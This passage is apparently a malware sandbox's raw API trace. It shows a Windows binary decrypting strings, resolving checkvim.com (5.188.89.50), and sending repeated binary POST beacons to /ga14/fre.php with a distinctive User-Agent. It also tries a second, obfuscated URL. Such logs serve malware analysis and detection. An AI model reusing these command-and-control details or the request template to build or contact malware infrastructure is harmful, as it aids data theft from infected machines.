CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0251.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.579] CryptDestroyKey (hKey=0x87e630) returned 1 [0251.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0251.580] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0251.580] GetProcessHeap () returned 0x840000 [0251.580] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0251.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0251.581] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0251.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0251.583] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0251.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0251.584] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0251.584] GetProcessHeap () returned 0x840000 [0251.584] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0251.584] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0251.586] GetProcessHeap () returned 0x840000 [0251.586] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0251.586] socket (af=2, type=1, protocol=6) returned 0x384 [0251.586] connect (s=0x384, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0251.657] FreeAddrInfoW (pAddrInfo=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0251.657] GetProcessHeap () returned 0x840000 [0251.657] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0251.658] GetProcessHeap () returned 0x840000 [0251.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0251.659] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0251.660] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0251.660] GetProcessHeap () returned 0x840000 [0251.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0251.660] GetProcessHeap () returned 0x840000 [0251.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0251.660] GetProcessHeap () returned 0x840000 [0251.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0251.660] GetProcessHeap () returned 0x840000 [0251.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0251.661] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0251.662] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0251.662] GetProcessHeap () returned 0x840000 [0251.662] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0251.662] GetProcessHeap () returned 0x840000 [0251.662] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0251.662] send (s=0x384, buf=0x873a58*, len=237, flags=0) returned 237 [0251.665] send (s=0x384, buf=0x87eb58*, len=159, flags=0) returned 159 [0251.665] GetProcessHeap () returned 0x840000 [0251.665] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0251.665] recv (in: s=0x384, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0252.034] GetProcessHeap () returned 0x840000 [0252.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0252.034] GetProcessHeap () returned 0x840000 [0252.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0252.034] GetProcessHeap () returned 0x840000 [0252.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0252.034] GetProcessHeap () returned 0x840000 [0252.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0252.034] closesocket (s=0x384) returned 0 [0252.069] GetProcessHeap () returned 0x840000 [0252.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0252.069] GetProcessHeap () returned 0x840000 [0252.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0252.069] GetProcessHeap () returned 0x840000 [0252.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0252.069] GetProcessHeap () returned 0x840000 [0252.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0252.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x93c) returned 0x384 [0252.071] Sleep (dwMilliseconds=0xea60) [0252.073] GetProcessHeap () returned 0x840000 [0252.073] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0252.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.074] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0252.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.086] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0252.094] GetProcessHeap () returned 0x840000 [0252.094] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0252.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.095] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0252.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.096] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0252.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.098] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.098] GetProcessHeap () returned 0x840000 [0252.098] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0252.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.099] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0252.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.100] CryptDestroyKey (hKey=0x87e570) returned 1 [0252.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.101] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0252.101] GetProcessHeap () returned 0x840000 [0252.101] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0252.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.102] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.103] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.105] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.106] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.106] GetProcessHeap () returned 0x840000 [0252.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0252.106] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0252.106] GetProcessHeap () returned 0x840000 [0252.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0252.107] GetProcessHeap () returned 0x840000 [0252.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0252.107] GetProcessHeap () returned 0x840000 [0252.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0252.107] GetProcessHeap () returned 0x840000 [0252.107] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0252.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.108] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0252.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.114] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0252.122] GetProcessHeap () returned 0x840000 [0252.122] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0252.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.123] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0252.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.124] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0252.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.126] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.126] GetProcessHeap () returned 0x840000 [0252.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0252.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.127] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0252.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.128] CryptDestroyKey (hKey=0x87e270) returned 1 [0252.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.129] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0252.129] GetProcessHeap () returned 0x840000 [0252.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0252.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.131] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0252.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.132] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0252.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.133] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0252.133] GetProcessHeap () returned 0x840000 [0252.133] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0252.133] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0252.135] GetProcessHeap () returned 0x840000 [0252.135] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0252.135] socket (af=2, type=1, protocol=6) returned 0x388 [0252.135] connect (s=0x388, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0252.206] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0252.206] GetProcessHeap () returned 0x840000 [0252.207] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fac8 [0252.207] GetProcessHeap () returned 0x840000 [0252.207] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0252.207] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0252.208] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0252.208] GetProcessHeap () returned 0x840000 [0252.208] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0252.208] GetProcessHeap () returned 0x840000 [0252.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0252.208] GetProcessHeap () returned 0x840000 [0252.208] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc68 [0252.208] GetProcessHeap () returned 0x840000 [0252.208] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0252.209] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0252.210] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0252.210] GetProcessHeap () returned 0x840000 [0252.210] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0252.210] GetProcessHeap () returned 0x840000 [0252.210] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0252.211] send (s=0x388, buf=0x873a58*, len=237, flags=0) returned 237 [0252.211] send (s=0x388, buf=0x87eb58*, len=159, flags=0) returned 159 [0252.212] GetProcessHeap () returned 0x840000 [0252.212] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0252.212] recv (in: s=0x388, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0252.591] GetProcessHeap () returned 0x840000 [0252.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0252.591] GetProcessHeap () returned 0x840000 [0252.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0252.591] GetProcessHeap () returned 0x840000 [0252.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0252.591] GetProcessHeap () returned 0x840000 [0252.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fac8 | out: hHeap=0x840000) returned 1 [0252.591] closesocket (s=0x388) returned 0 [0252.592] GetProcessHeap () returned 0x840000 [0252.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0252.592] GetProcessHeap () returned 0x840000 [0252.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0252.592] GetProcessHeap () returned 0x840000 [0252.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0252.592] GetProcessHeap () returned 0x840000 [0252.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0252.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x8f4) returned 0x388 [0252.593] Sleep (dwMilliseconds=0xea60) [0252.595] GetProcessHeap () returned 0x840000 [0252.595] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f908 [0252.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.604] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0252.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.630] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0252.649] GetProcessHeap () returned 0x840000 [0252.649] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0252.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.651] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0252.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.652] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0252.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.653] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.654] GetProcessHeap () returned 0x840000 [0252.654] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0252.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.655] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f908, pdwDataLen=0x19f9a4 | out: pbData=0x87f908, pdwDataLen=0x19f9a4) returned 1 [0252.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.663] CryptDestroyKey (hKey=0x87e630) returned 1 [0252.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.665] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0252.665] GetProcessHeap () returned 0x840000 [0252.665] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0252.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.666] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.667] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.668] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.668] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.668] GetProcessHeap () returned 0x840000 [0252.669] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0252.669] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0252.669] GetProcessHeap () returned 0x840000 [0252.669] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0252.669] GetProcessHeap () returned 0x840000 [0252.669] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0252.669] GetProcessHeap () returned 0x840000 [0252.669] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0252.669] GetProcessHeap () returned 0x840000 [0252.669] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0252.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.670] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0252.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.684] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0252.691] GetProcessHeap () returned 0x840000 [0252.691] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0252.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.692] CryptImportKey (in: hProv=0x86f710, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0252.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.693] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0252.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.694] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.695] GetProcessHeap () returned 0x840000 [0252.695] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0252.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.695] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0252.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.696] CryptDestroyKey (hKey=0x87e830) returned 1 [0252.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0252.697] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0252.697] GetProcessHeap () returned 0x840000 [0252.697] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0252.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.698] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0252.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.699] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0252.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.700] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0252.700] GetProcessHeap () returned 0x840000 [0252.700] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0252.701] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0252.703] GetProcessHeap () returned 0x840000 [0252.703] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, 